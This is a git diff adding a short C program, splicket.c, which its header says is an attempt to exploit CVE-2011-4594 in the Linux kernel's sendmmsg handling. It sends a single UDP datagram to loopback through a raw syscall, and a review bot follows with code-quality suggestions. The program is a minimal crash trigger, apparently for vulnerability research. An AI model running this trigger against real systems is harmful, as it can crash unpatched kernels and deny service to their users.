Diffstat (limited to 'splicket.c')
-rw-r--r-- | splicket.c | 78 |
1 files changed, 78 insertions, 0 deletions
diff --git a/splicket.c b/splicket.c
new file mode 100644
index 0000000..e939041
--- /dev/null
+++ b/splicket.c
@@ -0,0 +1,78 @@
+/*
+ * Socket Splickt
+ * by zx2c4
+ *
+ * This is an attempt to exploit CVE-2011-4594.
+ *
+ * It was patched in bc909d9ddbf7778371e36a651d6e4194b1cc7d4c.
+ *
+ */
+
+
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <signal.h>
+#include <netdb.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <net/if.h>
+#include <net/ethernet.h>
+#include <linux/if_packet.h>
+#include <asm/unistd.h>
+#include <errno.h>
+
+#ifndef __NR_sendmmsg
+#if defined( __PPC__)
+#define __NR_sendmmsg 349
+#elif defined(__x86_64__)
+#define __NR_sendmmsg 307
+#elif defined(__i386__)
+#define __NR_sendmmsg 345
+#else
+#error __NR_sendmmsg not defined
+#endif
+#endif
+
+struct reimp_mmsghdr {
+ struct msghdr msg_hdr;
+ unsigned int msg_len;
+};
+static inline int reimp_sendmmsg(int fd, struct reimp_mmsghdr *mmsg, unsigned int vlen, unsigned int flags)
+{
+ return syscall(__NR_sendmmsg, fd, mmsg, vlen, flags, NULL);
+}
+
+int main(int argc, char *argv[])
+{
+ const int fd = socket(AF_INET, SOCK_DGRAM, 0);
+ char buf[10];
+ struct iovec iovec[1];
+ struct reimp_mmsghdr datagram;
+ struct sockaddr_in addr;
+
+ memset(buf, 0, sizeof(buf));
+ memset(iovec, 0, sizeof(iovec));
+ memset(&datagram, 0, sizeof(datagram));
+ memset(&addr, 0, sizeof(addr));
+ addr.sin_family = AF_INET;
+ addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+ addr.sin_port = htons(10000);
+ iovec[0].iov_base = buf;
+ iovec[0].iov_len = sizeof(buf);
+ datagram.msg_hdr.msg_iov = iovec;
+ datagram.msg_hdr.msg_iovlen = 1;
+ datagram.msg_hdr.msg_name = &addr;
+ datagram.msg_hdr.msg_namelen = sizeof(addr);
+
+ errno = 0;
+ if (reimp_sendmmsg(fd, &datagram, 1, 0) < 0) {
+ perror("reimp_sendmmsg");
+ exit(1);
+ }
+
+ return 0;
+}
\ No newline at end of file |
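Review bot: The return value of `socket()` in the first declaration of `main` is never checked, so if socket creation fails the program still calls `reimp_sendmmsg` with fd -1 and the `perror("reimp_sendmmsg")` message blames the wrong call. Add `if (fd < 0) { perror("socket"); exit(1); }` right after the declarations. A successful run also prints nothing, so a test log carries no record of what the call returned; printing the return value and `datagram.msg_len` before `return 0;` would make runs comparable across kernels with and without the fix named in the header comment. `struct sockaddr_in` and `INADDR_LOOPBACK` appear to arrive only transitively (probably through `<netdb.h>`), so including `<netinet/in.h>` directly would be safer, and several of the other headers look unused.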